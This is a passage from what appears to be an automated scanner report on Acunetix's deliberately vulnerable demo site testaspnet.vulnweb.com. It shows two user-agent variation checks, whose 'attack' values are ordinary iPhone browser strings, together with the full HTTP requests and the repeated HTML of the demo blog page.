href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4
Evidence
Show / hide Request and Response
Request Header - size: 514 bytes.	GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:26 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Evidence
Show / hide Request and Response
Request Header - size: 519 bytes.	GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:26 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBOTh8PekaV12ulQ7L2d+yr9JWRLj" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">(83) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">(31) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a 